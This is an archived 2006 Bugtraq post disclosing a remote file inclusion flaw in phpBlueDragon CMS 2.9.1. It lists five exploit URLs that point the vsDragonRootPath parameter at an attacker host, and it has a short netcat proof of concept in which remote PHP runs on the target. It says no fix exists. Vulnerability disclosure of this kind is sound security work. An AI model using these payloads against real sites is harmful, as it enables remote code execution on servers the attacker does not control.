lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 22 Jun 2006 07:35:09 -0000
From: rozowa.landrynka@...m.nation.pl
To: bugtraq@...urityfocus.com
Subject: phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln


PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/

Affected files:
    root_includes/root_modules/team_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/  root_includes/root_modules//rss_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/       root_includes/root_modules/manual_admin.php?action=move_item&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/    root_includes/root_modules/forum_admin.php?action=group_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/    root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://bad.hacker.com:6666/

Solution:

None

Simple PoC:

nc -l -p 9999
...
http://some.site/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/
...
$ nc -l -p 9999
GET /public_includes/pub_kernel/pbd_move. HTTP/1.0
Host: 192.168.0.xx:9999

HTTP/0.9 200 OK

<?php phpinfo(); ?>
...
System 	OpenBSD xxx 3.9 xxx i386
... 

Credits:
shm

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ